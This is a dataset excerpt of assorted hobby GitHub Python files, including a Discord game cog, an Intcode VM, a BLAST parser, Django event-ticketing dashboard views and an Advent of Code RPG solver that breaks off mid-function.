if self.win_condition(move[1], move[0], red):\n                await self.display_grid(base, grid)\n                await self.bot.say('**{}** wins the game! 4 in a row!'.format(p1.name))\n                break\n\n            # Player 2\n\n            await self.display_grid(base, grid)\n            move = await self.player_input(base, grid, blue, p2)\n            if not move:\n                await self.bot.say('**{}** wins the game! 
**{}** gave up!'.format(p1.name, p2.name))\n break\n if self.win_condition(move[1], move[0], blue):\n await self.display_grid(base, grid)\n await self.bot.say('**{}** wins the game! 4 in a row!'.format(p2.name))\n break\n\n \n \n @commands.command(pass_context=True, aliases=['4row'])\n async def four_row(self, ctx, player: discord.Member):\n p1, p2 = ctx.message.author, player\n base = await self.bot.say('**{}** has challenged **{}** to a connect-four duel!'.format(p1.name, p2.name))\n await asyncio.sleep(3)\n await self.start_game(ctx, base, p1, p2)\n\n @staticmethod\n def win_condition(coordinate, grid, colour):\n row_num = coordinate[0]\n col_num = coordinate[1]\n\n horizontal_counter = 0\n horizontal_row = ''.join(grid[row_num])\n for value in horizontal_row:\n if value == colour:\n horizontal_counter += 1\n else:\n horizontal_counter = 0\n if horizontal_counter == 4:\n return True\n vertical_counter = 0\n for i in range(row_num+1):\n if grid[i][col_num] == colour:\n vertical_counter += 1\n else:\n vertical_counter = 0\n if vertical_counter == 4:\n return True\n diagonal_counter_one = 0\n diagonal_counter_two = 0\n for num in range(4):\n try:\n if grid[row_num-num][col_num+num] == colour:\n diagonal_counter_one += 1\n except:\n pass\n try:\n if grid[row_num-num][col_num-num] == colour:\n diagonal_counter_two += 1\n except:\n pass\n\n if diagonal_counter_one == 4:\n return True\n if diagonal_counter_two == 4:\n return True\n return False\n\n \n \n \ndef setup(bot):\n bot.add_cog(ConnectFour(bot))\n\n\n \n \n\n\n \n\n \n","repo_name":"umbresp/KnightBot2.0","sub_path":"cogs/conn4.py","file_name":"conn4.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"14489547491","text":"clientes = {}\n\ncomandas_abertas = []\n\n\n# Função Principal\n\ndef main():\n while True:\n print(\"Menu de opções:\")\n print(\"1. Cadastrar novo cliente\")\n print(\"2. Abrir comanda\")\n print(\"3. Fazer um pedido\")\n print(\"4. Fechar comanda\")\n print(\"5. Ver comandas abertas\")\n print(\"6. Ver clientes cadastrados\")\n print(\"7. Ver valor da comanda aberta\")\n print(\"8. Sair\")\n opcao = input(\"Digite a opção desejada: \")\n if opcao == \"1\":\n cadastrar_cliente()\n elif opcao == \"2\":\n abrir_comanda()\n elif opcao == \"3\":\n fazer_pedido()\n elif opcao == \"4\":\n fechar_comanda()\n elif opcao == \"5\":\n ver_comandas_abertas()\n elif opcao == \"6\":\n ver_clientes_cadastrados()\n elif opcao == \"7\":\n ver_valor_comanda_aberta()\n elif opcao == \"8\":\n sair()\n else:\n print(\"Opção inválida.\")\n\n\n# Cadastrar novo cliente\n\ndef cadastrar_cliente():\n nome = input(\"Digite o nome do cliente: \")\n telefone = input(\"Digite o telefone do cliente: \")\n clientes[telefone] = nome\n print(\"Cliente cadastrado com sucesso!\")\n\n# Abrir comanda\n\ndef abrir_comanda():\n telefone = input(\"Digite o número do telefone do cliente: \")\n if telefone in clientes:\n comandas_abertas.append({\n \"telefone\": telefone,\n \"pedidos\": [],\n \"valor_total\": 0\n })\n print(\"Comanda aberta com sucesso!\")\n else:\n print(\"Cliente não encontrado.\")\n\n\n# Fazer um pedido\n\ndef fazer_pedido():\n telefone = input(\"Digite o número do telefone do cliente: \")\n comanda = None\n for c in comandas_abertas:\n if c[\"telefone\"] == telefone:\n comanda = c\n break\n if comanda is None:\n print(\"Comanda não encontrada.\")\n return\n print(\"Menu de bebidas:\")\n print(\"1. Cerveja (R$5)\")\n print(\"2. 
Refrigerante (R$4)\")\n print(\"3. Suco (R$3)\")\n opcao = input(\"Digite o número da bebida desejada: \")\n if opcao == \"1\":\n bebida = \"Cerveja\"\n valor = 5\n elif opcao == \"2\":\n bebida = \"Refrigerante\"\n valor = 4\n elif opcao == \"3\":\n bebida = \"Suco\"\n valor = 3\n else:\n print(\"Opção inválida.\")\n return\n comanda[\"pedidos\"].append({\n \"bebida\": bebida,\n \"valor\": valor\n })\n comanda[\"valor_total\"] += valor\n print(\"Pedido adicionado com sucesso!\")\n\n# Fechar comanda\n\ndef fechar_comanda():\n telefone = input(\"Digite o número do telefone do cliente: \")\n comanda = None\n for c in comandas_abertas:\n if c[\"telefone\"] == telefone:\n comanda = c\n break\n if comanda is None:\n print(\"Comanda não encontrada.\")\n return\n print(\"Comanda do cliente\", clientes[telefone])\n for pedido in comanda[\"pedidos\"]:\n print(pedido[\"bebida\"], \"- R$\", pedido[\"valor\"])\n print(\"Valor total: R$\", comanda[\"valor_total\"])\n comandas_abertas.remove(comanda)\n print(\"Comanda fechada com sucesso!\")\n\n\n# Ver comandas abertas\n\ndef ver_comandas_abertas():\n for c in comandas_abertas:\n print(\"Comanda do cliente\", clientes[c[\"telefone\"]])\n for pedido in c[\"pedidos\"]:\n print(pedido[\"bebida\"], \"- R$\", pedido[\"valor\"])\n print(\"Valor total: R$\", c[\"valor_total\"])\n\n\n# Ver clientes cadastrados\n\ndef ver_clientes_cadastrados():\n for telefone, nome in clientes.items():\n print(nome, \"-\", telefone)\n\n\n# Ver valor da comanda aberta\n\ndef ver_valor_comanda_aberta():\n telefone = input(\"Digite o número do telefone do cliente: \")\n comanda = None\n for c in comandas_abertas:\n if c[\"telefone\"] == telefone:\n comanda = c\n break\n if comanda is None:\n print(\"Comanda não encontrada.\")\n return\n print(\"Valor total da comanda:\", comanda[\"valor_total\"])\n\n\n# Sair do sistema\n\ndef sair():\n print(\"Saindo do sistema...\")\n exit()\n\n# Chamar a função main() para iniciar o sistema\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ODCS1/python","sub_path":"praticando/p004/script7.py","file_name":"script7.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"21972078557","text":"#!/usr/bin/env python3\n\nimport sys\nimport itertools\n\nclass IntCodeVM:\n class Stop(Exception):\n pass\n\n class InvalidMode(Exception):\n pass\n\n class InvalidDestination(Exception):\n pass\n\n def __init__(self, memory, inputs=None):\n self.memory = memory.copy()\n self.ip = 0\n self.inputs = inputs.copy()\n self.inputs.reverse()\n self.outputs = []\n\n def value(self, parameter, mode):\n if mode == 0:\n return self.memory[parameter]\n if mode == 1:\n return parameter\n raise IntCodeVM.InvalidMode(f\"Invalid mode {mode}\")\n\n def get_parameter_addr(self, offset):\n return self.memory[self.ip + offset]\n\n def get_parameter(self, offset):\n opcode = self.memory[self.ip]\n mode = (opcode // (10 ** (1 + offset))) % 10\n p = self.memory[self.ip + offset]\n value = self.value(p, mode)\n return value\n\n def get_a(self):\n \"Get the A (first) parameter\"\n return self.get_parameter(1)\n\n def get_a_addr(self):\n \"Get the A (first) parameter\"\n return self.get_parameter_addr(1)\n\n def get_b(self):\n \"Get the B (second) parameter\"\n return self.get_parameter(2)\n\n def get_b_addr(self):\n \"Get the B (second) parameter\"\n return self.get_parameter_addr(2)\n\n def get_c(self):\n \"Get the C (third) parameter\"\n return self.get_parameter(3)\n\n def 
get_c_addr(self):\n \"Get the C (third) parameter\"\n return self.get_parameter_addr(3)\n\n def get_input(self):\n if not self.inputs:\n return int(input())\n return self.inputs.pop()\n\n def step(self):\n opcode = self.memory[self.ip]\n if opcode is None:\n raise IntCodeVM.Stop()\n\n operation = opcode % 100\n\n if operation == 1: # ADD\n self.memory[self.get_c_addr()] = self.get_a() + self.get_b()\n self.ip += 4\n elif operation == 2: # MUL\n self.memory[self.get_c_addr()] = self.get_a() * self.get_b()\n self.ip += 4\n elif operation == 3: # INPUT\n self.memory[self.get_a_addr()] = self.get_input()\n self.ip += 2\n elif operation == 4: # OUTPUT\n self.outputs.append(self.get_a())\n self.ip += 2\n elif operation == 5: # JUMP-IF-TRUE\n if self.get_a() != 0:\n self.ip = self.get_b()\n else:\n self.ip += 3\n elif operation == 6: # JUMP-IF-FALSE\n if self.get_a() == 0:\n self.ip = self.get_b()\n else:\n self.ip += 3\n elif operation == 7: # LESS-THAN\n if self.get_a() < self.get_b():\n self.memory[self.get_c_addr()] = 1\n else:\n self.memory[self.get_c_addr()] = 0\n self.ip += 4\n elif operation == 8: # EQUALS\n if self.get_a() == self.get_b():\n self.memory[self.get_c_addr()] = 1\n else:\n self.memory[self.get_c_addr()] = 0\n self.ip += 4\n elif operation == 99:\n self.ip += 1\n raise IntCodeVM.Stop()\n\n def run(self):\n try:\n while True:\n self.step()\n except IntCodeVM.Stop as _ex:\n return\n\n\ninfile = open(sys.argv[1])\n\nline = open(sys.argv[1]).readline()\nmemory = [int(x) for x in line.split(\",\")]\n\nsignals = []\nfor phase_set in itertools.permutations(range(5)):\n acc = 0\n for i in range(5):\n vm = IntCodeVM(memory.copy(), inputs=[phase_set[i], acc])\n vm.run()\n acc = vm.outputs[0]\n signals.append(acc)\n\nprint(f\"total is {max(signals)}\")\n","repo_name":"nrw505/adventofcode-2019","sub_path":"day7/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":3729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"20419197963","text":"import json\nimport webapp2\nimport configs\nfrom google.appengine.api import urlfetch\n\n\nclass QueueHandler(webapp2.RequestHandler):\n \"\"\"Task queue handler.\"\"\"\n\n def slack(self):\n \"\"\"Sends data to the Slack Webhook URL.\"\"\"\n text = self.request.get('text')\n if not text:\n return\n payload = {\n 'username': 'hl-bot',\n 'icon_emoji': ':rocket:',\n 'text': text\n }\n urlfetch.fetch(url=configs.SLACK_URL,\n payload=json.dumps(payload),\n method=urlfetch.POST,\n headers={'Content-Type': 'application/json'})\n","repo_name":"venvadlamani/HumanLink","sub_path":"controllers/tqueue.py","file_name":"tqueue.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"73768656624","text":"# fixed moves\n# unstable sort\n\nimport random\n\nl = [random.randint(-50,50) for _ in range(100)]\n\nfor i in range(len(l)-1):\n min_idx = i\n for j in range(i+1,len(l)):\n if l[j] < l[min_idx]:\n min_idx = j\n l[i], l[min_idx] = l[min_idx], l[i]\n\nprint(l == sorted(l))","repo_name":"jsg921019/algorithm_study","sub_path":"data_structure/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"74597127022","text":"import json\nfrom datetime import datetime\n\nfrom django.contrib import messages\nfrom django.contrib.auth.forms import 
UserChangeForm\nfrom django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom dashboard.forms import EventForm, UserForm, TicketForm\nfrom eventapp.models import Ticket, Coupon, Reservation\nfrom eventapp.models import Event\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\n\n\n# ************** Admin\n\n\n@login_required(login_url='authentification:login')\ndef admin_dashboard(request):\n users = User.objects.filter(is_staff=True)\n events = Event.objects.filter(user__is_staff=True, is_confirmed=False)\n tickets_sold = Reservation.objects.count()\n total_events = Event.objects.filter(user__is_staff=True).count()\n current_datetime = datetime.now()\n upcoming_tickets = Ticket.objects.filter(event__user__is_staff=True, reservation_date__gt=current_datetime).count()\n expired_tickets = Ticket.objects.filter(event__user__is_staff=True, reservation_date__lt=current_datetime).count()\n\n context = {\n 'users': users,\n 'events': events,\n 'tickets_sold': tickets_sold,\n 'total_events': total_events,\n 'upcoming_tickets': upcoming_tickets,\n 'expired_tickets': expired_tickets\n }\n\n return render(request, 'dashboard/admin/dashboard.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef add_user(request):\n if request.method == 'POST':\n form = UserForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('dashboard:admin-dashboard')\n else:\n form = UserForm()\n\n context = {'form': form}\n return render(request, 'dashboard/admin/add-user.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef edit_user(request, user_id):\n user = get_object_or_404(User, id=user_id)\n users = User.objects.exclude(id=user_id)\n\n if request.method == \"POST\":\n is_staff = request.POST.get('is_staff') == '1' # Check if the radio button value is '1'\n\n form = UserChangeForm(request.POST, instance=user)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_staff = is_staff\n user.email = form.cleaned_data['email'] # Update the email field\n user.save()\n return redirect('dashboard:admin-dashboard')\n else:\n form = UserChangeForm(instance=user, initial={'email': user.email}) # Set initial email value\n\n context = {\n 'form': form,\n 'users': users\n }\n return render(request, 'dashboard/admin/edit-user.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef confirm_event(request, event_id):\n if request.method == 'POST':\n event = get_object_or_404(Event, pk=event_id)\n event.is_confirmed = True\n event.save()\n return redirect('dashboard:admin-dashboard')\n else:\n return render(request, 'dashboard/admin/dashboard.html')\n\n\n# ************** Manager\n@login_required(login_url='authentification:login')\ndef dashboard(request):\n context = {\n \"welcome\": \"Welcome to your dashboard\"\n }\n # return render(request, 'authentification/dashboard.html', context=context)\n return render(request, 'dashboard/base/dashboard.html', context=context)\n\n\n@login_required(login_url='authentification:login')\ndef manager_dashboard(request):\n user = request.user\n events = Event.objects.filter(user=user)\n tickets = Ticket.objects.filter(event__in=events)\n return render(request, 'dashboard/manager/dashboard.html', {'events': events, 'tickets': tickets})\n\n\n@login_required(login_url='authentification:login')\ndef add_event(request):\n if request.method == 'POST':\n form = EventForm(request.POST, 
request.FILES)\n if form.is_valid():\n event = form.save(commit=False)\n event.user = request.user # Set the current user as the event's user\n event.save()\n return redirect('dashboard:manager-dashboard')\n else:\n form = EventForm()\n return render(request, 'dashboard/manager/add-event.html', {'form': form})\n\n\n@login_required(login_url='authentification:login')\ndef add_ticket(request):\n # Retrieve events for the connected user\n events = Event.objects.filter(user=request.user)\n coupons = Coupon.objects.filter(user=request.user) # Retrieve coupons for the connected user\n\n if request.method == 'POST':\n event_id = request.POST['event']\n quantity = request.POST['quantity']\n price = request.POST['price']\n coupon_id = request.POST['coupon'] # Get the selected coupon ID\n\n event = Event.objects.get(id=event_id)\n\n ticket = Ticket(event=event, user=request.user, quantity=quantity, price=price, coupon_id=coupon_id)\n ticket.save()\n\n return redirect('dashboard:manager-dashboard')\n\n # Pass the events and coupons to the template context\n context = {'events': events, 'coupons': coupons}\n\n return render(request, 'dashboard/manager/add-ticket.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef ticket_edit(request, ticket_id):\n ticket = get_object_or_404(Ticket, id=ticket_id)\n if request.method == 'POST':\n form = TicketForm(request.POST, instance=ticket)\n if form.is_valid():\n form.save()\n return redirect(\n 'dashboard:manager-dashboard') # Replace 'dashboard:ticket-list' with your actual URL name for the ticket list page\n else:\n form = TicketForm(instance=ticket)\n\n context = {\n 'form': form,\n 'ticket': ticket,\n }\n return render(request, 'dashboard/manager/edit-ticket.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef event_edit(request, event_id):\n event = Event.objects.get(id=event_id)\n\n if request.method == 'POST':\n form = EventForm(request.POST, request.FILES, instance=event)\n if form.is_valid():\n form.save()\n messages.success(request, 'Event updated successfully.')\n return redirect('dashboard:manager-dashboard')\n else:\n form = EventForm(instance=event)\n\n context = {\n 'event': event,\n 'form': form,\n }\n return render(request, 'dashboard/manager/edit-event.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef event_edit_dash(request, event_id):\n event = get_object_or_404(Event, id=event_id, user=request.user)\n\n if request.method == 'POST':\n # Process the form data\n form = EventForm(request.POST, instance=event)\n if form.is_valid():\n form.save()\n return JsonResponse({'success': True})\n else:\n return JsonResponse({'success': False, 'errors': form.errors})\n\n # GET request\n form = EventForm(instance=event)\n events = Event.objects.filter(user=request.user).values('id', 'title', 'date', 'time', 'location', 'category')\n\n context = {\n 'form': form,\n 'events_json': json.dumps({event['id']: event for event in events}),\n }\n\n return render(request, 'dashboard/manager/event-edit-dash.html', context)\n\n\n@login_required(login_url='authentification:login')\ndef delete_event(request, event_id):\n event = get_object_or_404(Event, pk=event_id)\n if request.method == 'POST':\n event.delete()\n # Redirect to the dashboard or any other page after successful deletion\n return redirect('dashboard:manager-dashboard')\n\n # Handle GET request or any other method\n # Render a confirmation template or perform any other desired action\n return render(request, 
'dashboard/delete_confirmation.html', {'event': event})\n\n\n# views.py\n@login_required(login_url='authentification:login')\ndef add_coupon(request):\n if request.method == 'POST':\n title = request.POST['title']\n code = request.POST['code']\n discount_amount = request.POST['discount_amount']\n\n coupon = Coupon(user=request.user, code=code, discount_amount=discount_amount, title=title)\n coupon.save()\n\n return redirect('dashboard:manager-dashboard')\n\n return render(request, 'dashboard/manager/add-coupon.html')\n\n\n# views.py\n@login_required(login_url='authentification:login')\ndef edit_coupon(request):\n # Retrieve coupons for the current user\n coupons = Coupon.objects.filter(user=request.user)\n\n if request.method == 'POST':\n coupon_id = request.POST['coupon']\n code = request.POST['code']\n discount_amount = request.POST['discount_amount']\n\n coupon = Coupon.objects.get(id=coupon_id)\n coupon.code = code\n coupon.discount_amount = discount_amount\n coupon.save()\n\n return redirect('dashboard:manager-dashboard')\n\n context = {'coupons': coupons}\n return render(request, 'dashboard/manager/edit-coupon.html', context)\n","repo_name":"portmaler/event-ticket-reservation","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"13606606184","text":"import pygame\r\nimport os\r\nfrom time import *\r\nimport random\r\nimport files.variables as variables\r\n\r\nclass Button(pygame.sprite.Sprite):\r\n def __init__(\r\n self, \r\n image_path,\r\n #key,\r\n do_function,\r\n x_position,\r\n y_position,\r\n width = 400, \r\n height = 60\r\n ) -> None:\r\n super().__init__()\r\n self.do_function = do_function\r\n #self.key = key\r\n self.image_path = image_path\r\n self.width = width\r\n self.height = height\r\n self.x_position = x_position\r\n self.y_position = y_position\r\n self.sprites = []\r\n self.clicked = False\r\n # images:\r\n self.sprites.append(pygame.image.load(os.path.join('Assets',image_path))) #.convert())#convert function can lead to transparency issues.\r\n self.image_index = 0\r\n self.image = pygame.transform.scale(self.sprites[self.image_index],(self.width, self.height))\r\n self.rect = self.image.get_rect()\r\n self.rect.topleft = (self.x_position, self.y_position) #sprite position\r\n #self.can_set_function_int = True\r\n #self.randnum = random.randint(888,9999)\r\n \r\n def update(self) -> None:\r\n if variables.show_menu:\r\n pos = pygame.mouse.get_pos()\r\n if self.rect.collidepoint(pos):\r\n if pygame.mouse.get_pressed()[0]==1 and self.clicked == False:\r\n self.clicked = True\r\n #print(\"button clicked\")\r\n variables.function_int = self.do_function \r\n if pygame.mouse.get_pressed()[0]==0:\r\n self.clicked = False\r\n #if passed_key == self.key:\r\n # self.do_function #pass #here do the action needed\r\n ","repo_name":"susda/IronFly","sub_path":"files/buttons_class.py","file_name":"buttons_class.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"1424674881","text":"#!/usr/bin/env python3\n\nimport argparse\nimport csv\nimport sys\nimport os\n#from collections import defaultdict\n\n# --------------------------------------------------\ndef get_args():\n\n parser = argparse.ArgumentParser(description='Parse BLAST tab')\n parser.add_argument('-p', '--pct_id', help='Percent identity',\n metavar='float', 
type=float, default=0)\n    parser.add_argument('-e', '--evalue', help='E value float',\n                        metavar='float', type=float, default=None)\n    parser.add_argument('file', metavar='file', help='BLAST tab output')\n    return parser.parse_args()\n\n# --------------------------------------------------\ndef main():\n    args = get_args()\n    p = args.pct_id\n    e = args.evalue\n    file = args.file\n\n    if not os.path.isfile(file):\n        print('\"{}\" is not a file'.format(file))\n        sys.exit(1)\n\n    field = ['qseqid', 'sseqid', 'pident', 'length', 'mismatch', 'gapopen', 'qstart', \n             'qend', 'sstart', 'send', 'bitscore', 'evalue']\n\n    for line in open(file):\n        d = dict(zip(field, line.split('\\t')))\n        row = [d['qseqid'], d['sseqid'], d['pident'], d['evalue']]\n\n        if e is not None and e >= float(d['evalue']) and float(d['pident']) >= p:\n            print('\\t'.join(row))\n        elif e is None and float(d['pident']) >= p:\n            print('\\t'.join(row))\n\n    \n# --------------------------------------------------\nif __name__ == '__main__':\n    main()\n","repo_name":"en3ri/abe487","sub_path":"problems/parse-blast/parse_blast_tab.py","file_name":"parse_blast_tab.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"42600895003","text":"#!/usr/bin/env python\nfrom ecmwfapi import ECMWFDataServer\nserver = ECMWFDataServer()\nfor yr in range(2009,2010) :\n    server.retrieve({\n    \"class\": \"ei\",\n    \"dataset\": \"interim\",\n    \"date\": \"%.4d-01-01/to/%.4d-12-31\" % (yr,yr),\n    \"expver\": \"1\",\n    \"grid\": \"1./1.\",\n    \"levtype\": \"sfc\",\n    \"param\": \"165.128/166.128\",\n    \"step\": \"0\",\n    \"stream\": \"oper\",\n    \"time\": \"00:00:00/06:00:00/12:00:00/18:00:00\",\n    \"type\": \"an\",\n    \"target\": \"erain.w10.%.4d.1deg.nc\" % (yr),\n    \"format\": \"netcdf\"\n    })\n","repo_name":"irudeva/FWND_erain_1deg","sub_path":"get.erain.py","file_name":"get.erain.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"2211518710","text":"import logging\nfrom typing import Any, Dict, Iterator, Optional\nimport urllib.parse\n\n\nfrom simple_ado.base_client import ADOBaseClient\nfrom simple_ado.http_client import ADOHTTPClient, ADOResponse\n\n\nclass ADOEndpointsClient(ADOBaseClient):\n    \"\"\"Wrapper class around the ADO service endpoints APIs.\n\n    :param http_client: The HTTP client to use for the client\n    :param log: The logger to use\n    \"\"\"\n\n    def __init__(self, http_client: ADOHTTPClient, log: logging.Logger) -> None:\n        super().__init__(http_client, log.getChild(\"endpoints\"))\n\n    def get_endpoints(self, project_id: str, *, endpoint_type: Optional[str] = None) -> ADOResponse:\n        \"\"\"Gets the service endpoints.\n\n        :param project_id: The identifier for the project\n        :param endpoint_type: The type to filter down to.\n\n        :returns: The ADO response with the data in it\n        \"\"\"\n        request_url = (\n            self.http_client.api_endpoint(project_id=project_id) + \"/serviceendpoint/endpoints?\"\n        )\n\n        parameters = {\"api-version\": \"6.0-preview.4\"}\n\n        if endpoint_type:\n            parameters[\"type\"] = endpoint_type\n\n        request_url += urllib.parse.urlencode(parameters)\n\n        response = self.http_client.get(request_url)\n        response_data = self.http_client.decode_response(response)\n        return self.http_client.extract_value(response_data)\n\n    def get_usage_history(\n        self, *, project_id: str, endpoint_id: str, top: Optional[int] = None\n    ) -> Iterator[Dict[str, Any]]:\n        \"\"\"Gets the usage 
history for an endpoint.\n\n        :param project_id: The identifier for the project\n        :param endpoint_id: The endpoint to get the history for\n        :param top: If set, get this number of results\n\n        :returns: The ADO response with the data in it\n        \"\"\"\n        request_url = (\n            self.http_client.api_endpoint(project_id=project_id)\n            + f\"/serviceendpoint/{endpoint_id}/executionhistory?\"\n        )\n\n        parameters: Dict[str, Any] = {\"api-version\": \"6.0-preview.1\"}\n\n        if top and top < 50:\n            parameters[\"top\"] = top\n        else:\n            parameters[\"top\"] = 50\n\n        request_url += urllib.parse.urlencode(parameters)\n\n        url = request_url\n\n        returned = 0\n\n        while True:\n            response = self.http_client.get(url)\n            decoded = self.http_client.decode_response(response)\n            for use in decoded[\"value\"]:\n                yield use\n                returned += 1\n\n                if top and returned >= top:\n                    return\n\n            if \"X-MS-ContinuationToken\" not in response.headers:\n                return\n\n            continuation_token = response.headers[\"X-MS-ContinuationToken\"]\n            url = request_url + f\"&continuationToken={continuation_token}\"\n","repo_name":"microsoft/simple_ado","sub_path":"simple_ado/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"91"} +{"seq_id":"23595071149","text":"from uuid import uuid4\n\nfrom elasticapm.contrib.starlette import make_apm_client, ElasticAPM\nfrom fastapi import FastAPI, Request\n\nfrom src.endpoints import health_check\nfrom src.endpoints.v1 import utters\nfrom src.settings import BASE_PATH, ELASTIC_APM, ENABLE_MONITORING\nfrom src.database.connection import database\n\napp = FastAPI()\n\nif ENABLE_MONITORING:\n    app.add_middleware(ElasticAPM, client=make_apm_client(ELASTIC_APM))\n\n\n@app.on_event(\"startup\")\nasync def startup():\n    await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n    await database.disconnect()\n\n\n@app.middleware(\"http\")\nasync def default_handler(request: Request, call_next):\n    request.state.transaction_id = str(uuid4())\n    response = await call_next(request)\n    return response\n\napp.include_router(\n    health_check.router,\n    prefix=f\"{BASE_PATH}\",\n    tags=[\"health\"],\n    responses={404: {\"description\": \"Not found\"}},\n)\n\napp.include_router(\n    utters.router,\n    prefix=f\"{BASE_PATH}\",\n    tags=[\"utters\"],\n    responses={404: {\"description\": \"Not found\"}},\n)\n","repo_name":"danielhs1/rasa_resposes","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"} +{"seq_id":"15309860307","text":"# --- Day 21: RPG Simulator 20XX ---\n# Little Henry Case got a new video game for Christmas. It's an RPG, and he's stuck on a boss.\n# He needs to know what equipment to buy at the shop. He hands you the controller.\n#\n# In this game, the player (you) and the enemy (the boss) take turns attacking. The player always goes first. Each\n# attack reduces the opponent's hit points by at least 1. The first character at or below 0 hit points loses.\n#\n# Damage dealt by an attacker each turn is equal to the attacker's damage score minus the defender's armor score. An\n# attacker always does at least 1 damage. So, if the attacker has a damage score of 8, and the defender has an armor\n# score of 3, the defender loses 5 hit points. 
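In other words, the damage dealt each turn is max(1, attacker damage - defender armor). 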
If the defender had an armor score of 300, the defender would still\n# lose 1 hit point.\n#\n# Your damage score and armor score both start at zero. They can be increased by buying items in exchange for gold.\n# You start with no items and have as much gold as you need. Your total damage or armor is equal to the sum of those\n# stats from all of your items. You have 100 hit points.\n#\n# Here is what the item shop is selling:\n#\n# Weapons: Cost Damage Armor\n# Dagger 8 4 0\n# Shortsword 10 5 0\n# Warhammer 25 6 0\n# Longsword 40 7 0\n# Greataxe 74 8 0\n#\n# Armor: Cost Damage Armor\n# Leather 13 0 1\n# Chainmail 31 0 2\n# Splintmail 53 0 3\n# Bandedmail 75 0 4\n# Platemail 102 0 5\n#\n# Rings: Cost Damage Armor\n# Damage +1 25 1 0\n# Damage +2 50 2 0\n# Damage +3 100 3 0\n# Defense +1 20 0 1\n# Defense +2 40 0 2\n# Defense +3 80 0 3\n\n# You must buy exactly one weapon; no dual-wielding. Armor is optional, but you can't use more than one. You can buy\n# 0-2 rings (at most one for each hand). You must use any items you buy. The shop only has one of each item,\n# so you can't buy, for example, two rings of Damage +3.\n#\n# For example, suppose you have 8 hit points, 5 damage, and 5 armor, and that the boss has 12 hit points, 7 damage,\n# and 2 armor:\n#\n# The player deals 5-2 = 3 damage; the boss goes down to 9 hit points.\n# The boss deals 7-5 = 2 damage; the player goes down to 6 hit points.\n# The player deals 5-2 = 3 damage; the boss goes down to 6 hit points.\n# The boss deals 7-5 = 2 damage; the player goes down to 4 hit points.\n# The player deals 5-2 = 3 damage; the boss goes down to 3 hit points.\n# The boss deals 7-5 = 2 damage; the player goes down to 2 hit points.\n# The player deals 5-2 = 3 damage; the boss goes down to 0 hit points.\n# In this scenario, the player wins! (Barely.)\n#\n# You have 100 hit points. The boss's actual stats are in your puzzle input. What is the least amount of gold you can\n# spend and still win the fight?\n\n\nfrom itertools import combinations, count\n\n# constants\nWEAPONS = {\n 'Dagger': {\n 'cost': 8, 'damage': 4, 'armor': 0\n },\n 'Shortsword': {\n 'cost': 10, 'damage': 5, 'armor': 0\n },\n 'Warhammer': {\n 'cost': 25, 'damage': 6, 'armor': 0\n },\n 'Longsword': {\n 'cost': 40, 'damage': 7, 'armor': 0\n },\n 'Greataxe': {\n 'cost': 74, 'damage': 8, 'armor': 0\n }\n}\n\n# all armor with additional 'None' Armor for convenience\nARMOR = {\n 'Leather': {\n 'cost': 13, 'damage': 0, 'armor': 1\n },\n 'Chainmail': {\n 'cost': 31, 'damage': 0, 'armor': 2\n },\n 'Splintmail': {\n 'cost': 53, 'damage': 0, 'armor': 3\n },\n 'Bandedmail': {\n 'cost': 75, 'damage': 0, 'armor': 4\n },\n 'Platemail': {\n 'cost': 102, 'damage': 0, 'armor': 5\n },\n 'Bare': {\n 'cost': 0, 'damage': 0, 'armor': 0\n }\n}\n\nRINGS = {\n 'Damage +1': {\n 'cost': 25, 'damage': 1, 'armor': 0\n },\n 'Damage +2': {\n 'cost': 50, 'damage': 2, 'armor': 0\n },\n 'Damage +3': {\n 'cost': 100, 'damage': 3, 'armor': 0\n },\n 'Defense +1': {\n 'cost': 20, 'damage': 0, 'armor': 1\n },\n 'Defense +2': {\n 'cost': 40, 'damage': 0, 'armor': 2\n },\n 'Defense +3': {\n 'cost': 80, 'damage': 0, 'armor': 3\n }\n}\n\n# boss input here\nBOSS = {\n 'damage': 8,\n 'armor': 2,\n 'hp': 100,\n}\n\n\ndef game_handler() -> int:\n # Play all possible games with 1 weapon, 0 or 1 armor, <0-2> rings. 
